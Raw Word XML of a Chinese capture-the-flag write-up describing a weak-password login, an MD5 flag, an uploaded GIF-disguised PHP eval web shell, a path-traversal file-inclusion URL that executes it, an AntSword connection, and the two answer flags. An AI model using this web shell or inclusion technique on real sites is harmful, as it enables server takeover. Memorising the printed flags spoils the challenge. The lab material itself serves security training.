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4F0D" w14:textId="4BD6FF3F" w:rsidR="0068127A" w:rsidRDefault="0068127A" w:rsidP="007738D1"/>
    <w:p w14:paraId="2889F844" w14:textId="4AE3EC7F" w:rsidR="007738D1" w:rsidRDefault="002F17AA" w:rsidP="00BE5BF6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0038081F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007738D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1379F142" w14:textId="388E44C3" w:rsidR="007738D1" w:rsidRDefault="00DC062F" w:rsidP="007738D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过弱口令</w:t>
      </w:r>
      <w:r>
        <w:t>admin/12346678</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63001E85" w14:textId="413EA7A7" w:rsidR="00DC062F" w:rsidRDefault="00DC062F" w:rsidP="007738D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BB27E06" wp14:editId="6EFA5E7C">
            <wp:extent cx="5274310" cy="1906905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1700688892" name="图片 1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88892" name="图片 1" descr="QR 代码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6E33" w14:textId="19E5FD75" w:rsidR="00DC062F" w:rsidRDefault="00AB23C1" w:rsidP="007738D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以扫码试试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC3BDC2" w14:textId="6A7C692A" w:rsidR="001E765C" w:rsidRDefault="00AB23C1" w:rsidP="001E765C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描第一个码</w:t>
      </w:r>
      <w:r w:rsidR="001E765C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001E765C" w:rsidRPr="001E765C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E765C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一段MD5加密的字符串（</w:t>
      </w:r>
      <w:r w:rsidR="001E765C" w:rsidRPr="006B504A">
        <w:t>e0dfb111be8e4a82f928bc87efc3b2b9</w:t>
      </w:r>
      <w:r w:rsidR="001E765C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D45AA3" w14:textId="0953AF65" w:rsidR="00806D3A" w:rsidRDefault="00806D3A" w:rsidP="007738D1"/>
    <w:p w14:paraId="69BF0067" w14:textId="25090367" w:rsidR="00AB23C1" w:rsidRDefault="00806D3A" w:rsidP="00806D3A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00806D3A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="335AEB8E" wp14:editId="1D9259E9">
            <wp:extent cx="3716122" cy="1558138"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1001848845" name="图片 1" descr="背景图案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48845" name="图片 1" descr="背景图案&#10;&#10;低可信度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370" b="81062"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3717027" cy="155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F8729" w14:textId="3A8011C2" w:rsidR="001E765C" w:rsidRDefault="001E765C" w:rsidP="00964FC9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解密后得到flag</w:t>
      </w:r>
      <w:r w:rsidR="00F61F20">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00CB1461">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00CB1461" w:rsidRPr="00CB1461">
        <w:t>flag{md53454kfodkfkfdsmd5}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26753950" w14:textId="77777777" w:rsidR="00964FC9" w:rsidRDefault="00964FC9" w:rsidP="00964FC9"/>
    <w:p w14:paraId="62CB001F" w14:textId="1B860AA3" w:rsidR="00964FC9" w:rsidRDefault="001E765C" w:rsidP="00964FC9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0052CAC9" wp14:editId="64C1A24C">
            <wp:extent cx="5274310" cy="2287270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1067585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8560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E39B" w14:textId="3DBD6FB5" w:rsidR="00F61F20" w:rsidRDefault="008F7A10" w:rsidP="00964FC9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击内容管理，上传图片</w:t>
      </w:r>
      <w:r w:rsidR="005C4E6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（该图片需为图片马）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599C4889" w14:textId="77777777" w:rsidR="00233292" w:rsidRDefault="005C4E6D" w:rsidP="00233292">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片马内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160050E" w14:textId="786BC61D" w:rsidR="00233292" w:rsidRDefault="00233292" w:rsidP="00233292">
      <w:r>
        <w:t>GIF89a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6AC817" w14:textId="7BAEB53C" w:rsidR="005C4E6D" w:rsidRPr="005C4E6D" w:rsidRDefault="00233292" w:rsidP="00233292">
      <w:r>
        <w:t>&lt;?php @eval($_POST['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6DFD0D" w14:textId="1456971B" w:rsidR="005C4E6D" w:rsidRPr="005C4E6D" w:rsidRDefault="00233292" w:rsidP="00964FC9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58EF9052" wp14:editId="637B1CDB">
            <wp:extent cx="5274310" cy="1084580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="268434965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34965" name="图片 1" descr="图形用户界面, 文本, 应用程序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7034" w14:textId="2E994EDB" w:rsidR="008F7A10" w:rsidRDefault="00233292" w:rsidP="00964FC9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传图片马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377CC993" w14:textId="7F20A924" w:rsidR="00233292" w:rsidRDefault="00501EEC" w:rsidP="00964FC9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2305D512" wp14:editId="0EA4B83F">
            <wp:extent cx="5274310" cy="1341120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="105673363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33634" name="图片 1" descr="图形用户界面, 文本, 应用程序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5152" w14:textId="087A3E8A" w:rsidR="00964FC9" w:rsidRDefault="006160B2" w:rsidP="00964FC9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拼接图片路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383F54F9" w14:textId="1494D6F3" w:rsidR="00964FC9" w:rsidRDefault="006160B2" w:rsidP="00964FC9">
      <w:pP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</w:pPr>
      <w:r w:rsidRPr="006160B2">
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="008F13D7" w:rsidRPr="008F13D7">
        <w:t xml:space="preserve">your_ip:port </w:t>
      </w:r>
      <w:r w:rsidRPr="006160B2">
        <w:t>/site/upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/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>uploads/2023/11/01/2839406541dcc7dccae508643732.jpg</w:t>
      </w:r>
      <w:r w:rsidR="003B7C96">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="393939"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，直接用蚁剑连接会失败，这里需要文件包含</w:t>
      </w:r>
      <w:r w:rsidR="001B1D9F">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="393939"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B08BFA2" w14:textId="0ACADAEA" w:rsidR="001B1D9F" w:rsidRDefault="001B1D9F" w:rsidP="00964FC9">
      <w:pP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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="393939"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>点击我的文件，随便点击提交，会看</w:t>
      </w:r>
      <w:r w:rsidR="002E5ECA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="393939"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="393939"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="393939"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r w:rsidR="002E5ECA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="393939"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidR="001C3F65">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="393939"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidR="001C3F65">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="393939"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>filename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="393939"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会变化</w:t>
      </w:r>
      <w:r w:rsidR="002E5ECA">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="393939"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，此处存在文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB7A706" w14:textId="0EFC96EE" w:rsidR="001C3F65" w:rsidRDefault="001C3F65" w:rsidP="00964FC9">
      <w:pP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B36D31A" wp14:editId="7016E531">
            <wp:extent cx="4818576" cy="1061720"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5080"/>
            <wp:docPr id="1457185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85882" name="图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576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1DE3" w14:textId="4D942585" w:rsidR="001B1D9F" w:rsidRDefault="002E5ECA" w:rsidP="00964FC9">
      <w:pP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7703C27" wp14:editId="16C39FB4">
            <wp:extent cx="4903354" cy="1086485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1879851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51302" name="图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54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4EA4" w14:textId="77777777" w:rsidR="003B7C96" w:rsidRDefault="003B7C96" w:rsidP="00964FC9"/>
    <w:p w14:paraId="3F9E3D35" w14:textId="2201A3E8" w:rsidR="007738D1" w:rsidRDefault="002E5ECA" w:rsidP="007738D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新拼接上传的图片路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1007D3BE" w14:textId="41F2CF08" w:rsidR="002E5ECA" w:rsidRDefault="00FF795B" w:rsidP="007738D1">
      <w:r w:rsidRPr="00FF795B">
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="008F13D7" w:rsidRPr="008F13D7">
        <w:t>your_ip:port</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF795B">
        <w:t>/site/file/local.php?filename=../../upload/uploads/2023/11/01/2839406541dcc7dccae508643732.jpg&amp;submit=%E6%8F%90%E4%BA%A4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033868F4" w14:textId="5E5045C8" w:rsidR="00FF795B" w:rsidRDefault="00FF795B" w:rsidP="007738D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4891EBAA" wp14:editId="7499ACFA">
            <wp:extent cx="4655653" cy="1075690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1842552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52954" name="图片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653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E30C" w14:textId="0E8A72B3" w:rsidR="00FF795B" w:rsidRDefault="00FF795B" w:rsidP="007738D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蚁剑连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084B335D" w14:textId="290A1151" w:rsidR="00324CDB" w:rsidRDefault="00D5173A" w:rsidP="007738D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7594D7BD" wp14:editId="2A141C3B">
            <wp:extent cx="5274310" cy="3503930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="665986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8661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CDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入ffff目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE1011" w14:textId="7E2CC554" w:rsidR="00324CDB" w:rsidRDefault="00324CDB" w:rsidP="007738D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="169B277F" wp14:editId="0AF6ED07">
            <wp:extent cx="5274310" cy="3468180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="537640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40277" name="图片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A57E" w14:textId="77777777" w:rsidR="00D5173A" w:rsidRPr="00FF795B" w:rsidRDefault="00D5173A" w:rsidP="007738D1"/>
    <w:p w14:paraId="39EFBD55" w14:textId="3188E969" w:rsidR="00E31ABD" w:rsidRDefault="00A879C1" w:rsidP="007738D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得flag</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004C19DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00E31ABD" w:rsidRPr="00E31ABD">
        <w:t>flag{8543jkfdlfd8054klfdlfjl}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A5B685" w14:textId="261F7B61" w:rsidR="00A879C1" w:rsidRDefault="00FB7E0E" w:rsidP="007738D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20CD0844" wp14:editId="7549D88B">
            <wp:extent cx="5274310" cy="2582545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="771735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3592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19B8" w14:textId="521A3132" w:rsidR="00A879C1" w:rsidRDefault="00B9020F" w:rsidP="007738D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51DE296C" wp14:editId="55DDF7D1">
            <wp:extent cx="5274310" cy="1547495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="189365380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53801" name="图片 1" descr="图形用户界面, 应用程序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C231" w14:textId="18DDC394" w:rsidR="00701959" w:rsidRDefault="002F17AA" w:rsidP="00701959">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00701959">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、答案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E645B42" w14:textId="77777777" w:rsidR="00701959" w:rsidRDefault="00701959" w:rsidP="00701959">
      <w:r w:rsidRPr="00CB1461">
        <w:t>flag{md53454kfodkfkfdsmd5}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB0B082" w14:textId="2DCAB69E" w:rsidR="00701959" w:rsidRPr="00701959" w:rsidRDefault="00701959" w:rsidP="00701959">
      <w:r w:rsidRPr="00E31ABD">
        <w:t>flag{8543jkfdlfd8054klfdlfjl}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7775906F" w14:textId="77777777" w:rsidR="00701959" w:rsidRPr="00701959" w:rsidRDefault="00701959" w:rsidP="00701959"/>
    <w:p w14:paraId="29080BD1" w14:textId="77777777" w:rsidR="00701959" w:rsidRPr="00F61F20" w:rsidRDefault="00701959" w:rsidP="007738D1"/>
    <w:sectPr w:rsidR="00701959" w:rsidRPr="00F61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791D6" w14:textId="77777777" w:rsidR="004D2EA4" w:rsidRDefault="004D2EA4" w:rsidP="007738D1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1C552CF3" w14:textId="77777777" w:rsidR="004D2EA4" w:rsidRDefault="004D2EA4" w:rsidP="00773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B1B07" w14:textId="77777777" w:rsidR="004D2EA4" w:rsidRDefault="004D2EA4" w:rsidP="007738D1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="48D49834" w14:textId="77777777" w:rsidR="004D2EA4" w:rsidRDefault="004D2EA4" w:rsidP="00773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A21B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="23E45E62"/>
    <w:lvl w:ilvl="0" w:tplc="B2CE0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418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1A"/>
    <w:rsid w:val="00103720"/>
    <w:rsid w:val="001358AC"/>
    <w:rsid w:val="0019362C"/>
    <w:rsid w:val="001B1D9F"/>
    <w:rsid w:val="001B4B74"/>
    <w:rsid w:val="001C3F65"/>
    <w:rsid w:val="001E765C"/>
    <w:rsid w:val="00233292"/>
    <w:rsid w:val="002C3658"/>
    <w:rsid w:val="002E5ECA"/>
    <w:rsid w:val="002F17AA"/>
    <w:rsid w:val="00324CDB"/>
    <w:rsid w:val="00370F7D"/>
    <w:rsid w:val="003721DC"/>
    <w:rsid w:val="0038081F"/>
    <w:rsid w:val="003B7C96"/>
    <w:rsid w:val="003F63EF"/>
    <w:rsid w:val="004A5971"/>
    <w:rsid w:val="004C19DB"/>
    <w:rsid w:val="004D2EA4"/>
    <w:rsid w:val="004F5D32"/>
    <w:rsid w:val="00501EEC"/>
    <w:rsid w:val="0055097C"/>
    <w:rsid w:val="005A4592"/>
    <w:rsid w:val="005C4E6D"/>
    <w:rsid w:val="006160B2"/>
    <w:rsid w:val="0068127A"/>
    <w:rsid w:val="00681F1C"/>
    <w:rsid w:val="006B504A"/>
    <w:rsid w:val="006D1993"/>
    <w:rsid w:val="00701959"/>
    <w:rsid w:val="007738D1"/>
    <w:rsid w:val="00806D3A"/>
    <w:rsid w:val="00880321"/>
    <w:rsid w:val="008F13D7"/>
    <w:rsid w:val="008F7A10"/>
    <w:rsid w:val="009230E7"/>
    <w:rsid w:val="00964FC9"/>
    <w:rsid w:val="009B741A"/>
    <w:rsid w:val="00A604D1"/>
    <w:rsid w:val="00A879C1"/>
    <w:rsid w:val="00AB23C1"/>
    <w:rsid w:val="00B456BE"/>
    <w:rsid w:val="00B9020F"/>
    <w:rsid w:val="00BC7B1E"/>
    <w:rsid w:val="00BE5BF6"/>
    <w:rsid w:val="00CA1B9E"/>
    <w:rsid w:val="00CB1461"/>
    <w:rsid w:val="00CD7B91"/>
    <w:rsid w:val="00CE6588"/>
    <w:rsid w:val="00CE6DBB"/>
    <w:rsid w:val="00D5173A"/>
    <w:rsid w:val="00D66434"/>
    <w:rsid w:val="00DA2BB9"/>
    <w:rsid w:val="00DC062F"/>
    <w:rsid w:val="00DC2CA5"/>
    <w:rsid w:val="00E31ABD"/>
    <w:rsid w:val="00EC2C74"/>
    <w:rsid w:val="00EE124D"/>
    <w:rsid w:val="00F2071C"/>
    <w:rsid w:val="00F61F20"/>
    <w:rsid w:val="00FB7E0E"/>
    <w:rsid w:val="00FC39DD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4033F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1B386AB2-209C-4781-9269-0B06D4F5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95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E12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8D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38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8D1"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="007738D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9362C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EE12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616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5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扈 筱</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>扈 筱</cp:lastModifiedBy>
  <cp:revision>55</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-01T03:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-01T08:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>